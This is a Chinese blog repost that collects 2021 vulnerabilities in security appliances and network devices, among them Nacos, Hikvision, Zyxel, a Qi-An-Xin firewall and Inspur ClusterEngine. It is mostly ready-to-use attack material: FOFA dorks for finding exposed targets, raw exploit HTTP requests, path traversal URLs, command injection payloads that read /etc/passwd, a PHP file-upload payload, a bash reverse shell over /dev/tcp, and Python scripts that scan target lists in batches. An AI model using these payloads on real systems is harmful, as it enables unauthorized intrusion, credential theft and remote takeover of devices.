当前位置:   article > 正文

2021年网络安全设备漏洞集合_360天擎文件上传漏洞

360天擎文件上传漏洞

360天擎SQL注入漏洞

描述

fofa title="360新天擎"

POC & 利用

/api/dp/rptsvcsyncpoint?ccid=1

Snipaste_2021-04-12_11-52-50.png

360天擎信息泄露

描述

/api/dbstat/gettablessize

POC & 利用

Snipaste_2021-04-12_12-01-55.png

Alibaba 阿里巴巴Nacos认证绕过

描述

fofa:title="Nacos"

POC & EXP

  1. # 添加用户
  2. POST /nacos/v1/auth/users HTTP/1.1
  3. Host: 127.0.0.1
  4. User-Agent: Nacos-Server
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/
  6. *;q=0.8
  7. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  8. Accept-Encoding: gzip, deflate
  9. DNT: 1
  10. Connection: close
  11. Content-Type: application/x-www-form-urlencoded
  12. Content-Length: 0
  13. username=aaaa&password=bbbb
  1. # 查看用户
  2. GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
  3. Host: 127.0.0.1
  4. User-Agent: Nacos-Server
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
  6. q=0.8
  7. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  8. Accept-Encoding: gzip, deflate
  9. DNT: 1
  10. Connection: close

D-Link DCS系列监控账号密码信息泄露

描述

fofa搜:app="D_Link-DCS-2530L"
拼接路径:/config/getuser?index=0

利用

Snipaste_2021-04-12_10-20-19.png

HIKVISION 海康威视流媒体管理服务器 后台任意读取

描述

通过文件遍历漏洞获取敏感信息

POC & EXP

http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

hiv-6.png

Kyan 网络监控设备账号密码泄露漏洞

描述

fofa title="platform - Login"

POC & EXP

访问url,http://127.0.0.1/hosts ,显示用户名密码

2359469-20210418111405992-149165347.png

Zyxel NBG2105 合勤科技路由器身份验证绕过

描述

Zyxel NBG2105 存在身份验证绕过,攻击者通过更改 login参数可用实现后台登陆 影响版本:Zyxel NBG2105 fofa app="ZyXEL-NBG2105"

POC & EXP

  1. # python3
  2. import requests
  3. import sys
  4. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  5. def poc(url):
  6. exp = url + "/login_ok.htm"
  7. header = {
  8. "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
  9. "cookie":"login=1",
  10. }
  11. try:
  12. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  13. response = requests.get(url=exp, headers=header, verify=False,timeout=10)
  14. #print(response.text)
  15. if response.status_code == 200 and "GMT" in response.text:
  16. print(exp + " 存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
  17. print("数据信息如下:")
  18. print(response.text)
  19. else:
  20. print(exp + " 不存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
  21. except Exception as e:
  22. print(exp + "请求失败!!")
  23. def main():
  24. url = str(input("请输入目标url:"))
  25. poc(url)
  26. if __name__ == "__main__":
  27. main()

三星 WLAN AP WEA453e路由器远程命令执行漏洞

描述

WLAN AP WEA453e路由器 存在远程命令执行漏洞,可在未授权的情况下执行任意命令获取服务器权限 fofa title=="Samsung WLAN AP"

POC & EXP

  1. # 请求包
  2. POST /(download)/tmp/a.txt HTTP/1.1
  3. Host: xxx.xxx.xxx.xxx
  4. Connection: close
  5. Content-Length: 0
  6. command1=shell:cat /etc/passwd| dd of=/tmp/a.txt

313213.png

和信创天云桌面文件上传漏洞

描述

存在某接口可被攻击者利用上传文件

利用

上传

  1. POST /Upload/upload_file.php?l=test HTTP/1.1
  2. Host: x.x.x.x
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
  4. Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  5. Accept-Encoding: gzip, deflate
  6. Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
  7. Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
  8. Connection: close
  9. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
  10. Content-Length: 183
  11. ------WebKitFormBoundaryfcKRltGv
  12. Content-Disposition: form-data; name="file"; filename="test.php"
  13. Content-Type: image/avif
  14. <?php phpinfo(); ?>
  15. ------WebKitFormBoundaryfcKRltGv--

访问

http://xxx.xx.xxx.xxx/Upload/test/test.php

奇安信 网康下一代防火墙远程命令执行漏洞

描述

fofa app="网康科技-下一代防火墙"

利用

利用jar包: https://github.com/Yang0615777/PocList/blob/main/QiAnXin-WangKangFirewall-RCE.jar

POC

  1. POST /directdata/direct/router HTTP/1.1
  2. Host: x.x.x.x
  3. Connection: close
  4. Cache-Control: max-age=0
  5. sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
  6. sec-ch-ua-mobile: ?0
  7. Upgrade-Insecure-Requests: 1
  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  10. Sec-Fetch-Site: cross-site
  11. Sec-Fetch-Mode: navigate
  12. Sec-Fetch-User: ?1
  13. Sec-Fetch-Dest: document
  14. Referer: https://x.x.x.x/
  15. Accept-Encoding: gzip, deflate
  16. Accept-Language: zh-CN,zh;q=0.9
  17. Cookie: PHPSESSID=d6o8gdugrhmvf2sq18ojhj50p3; ys-active_page=s%3A
  18. Content-Length: 178
  19. {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

然后访问:/test_test.txt

640.png

安天追影威胁分析系统越权访问漏洞

描述

通过修改返回包内容,可以绕过验证,直接登陆系统,可以查看到部分敏感信息

POC & EXP

  • 访问威胁分析系统,抓包一条"/api/user/islogin"的请求,返回包的内容为
    {"role": "", "login_status": false, "result": "ok"}
  • 把请求中的 login_status 改为 true
  • 再次访问首页成功进入页面

朗视 TG GSM ⽹关目录遍历漏洞

描述

朗视 TG GSM ⽹关存在⽬录遍历漏洞

POC & EXP

  1. # 获取固件解密密码
  2. http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
  3. # 查看/etc/passwd:
  4. http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

浪潮 ClusterEngineV4.0 任意命令执行漏洞

描述

登录处抓包,然后闭合username字段重发引发报错 fofa title="TSCEV4.0"

POC & 利用

  1. # POC测试(出现 root:x:0:0 则存在漏洞)
  2. op=login&username=peiqi`$(cat /etc/passwd)`
  3. {"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user peiqi does not exist\nerror:1\n"}
  4. # 反弹shell
  5. op=login&username=peiqi`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)`

锐捷RG-UAC统一上网行为管理审计系统信息泄露

描述

锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 fofa title="RG-UAC登录页面" && body="admin"

POC & EXP

  1. import requests
  2. import sys
  3. import random
  4. import re
  5. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  6. def title():
  7. print('+------------------------------------------')
  8. print('+ \033[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统 \033[0m')
  9. print('+ \033[36m使用格式: python3 poc.py \033[0m')
  10. print('+ \033[36mFile >>> ip.txt\033[0m')
  11. print('+------------------------------------------')
  12. def POC_1(target_url):
  13. vuln_url = target_url
  14. headers = {
  15. "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
  16. }
  17. try:
  18. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  19. response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
  20. if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
  21. print("\033[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \033[0m".format(target_url))
  22. else:
  23. print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
  24. except Exception as e:
  25. print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
  26. def Scan(file_name):
  27. with open(file_name, "r", encoding='utf8') as scan_url:
  28. for url in scan_url:
  29. if url[:4] != "http":
  30. url = "http://" + url
  31. url = url.strip('\n')
  32. try:
  33. POC_1(url)
  34. except Exception as e:
  35. print("\033[31m[x] 请求报错 \033[0m".format(e))
  36. continue
  37. if __name__ == '__main__':
  38. title()
  39. file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m"))
  40. Scan(file_name)

齐治堡垒机任意用户登录

描述

齐治堡垒机某版本任意用户登录.md fofa app="齐治科技-堡垒机"

POC & EXP

  1. import requests,sys,re,urllib3
  2. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  3. # for url in open("C:/1.txt","r"):
  4. if len(sys.argv)<2:
  5. print("[+]Use: pyhton3 齐治科技-堡垒机.py http://ip:port")
  6. print("[+]Explain: HADESI")
  7. print("[+]============================")
  8. sys.exit()
  9. url=sys.argv[1]
  10. url1=url+"/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"
  11. res = requests.get(url=url1,verify=False)
  12. # print (res.status_code)
  13. if res.status_code == 200 :
  14. print(url1+">>>>>漏洞存在")
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/150711
推荐阅读
相关标签
  

闽ICP备14008679号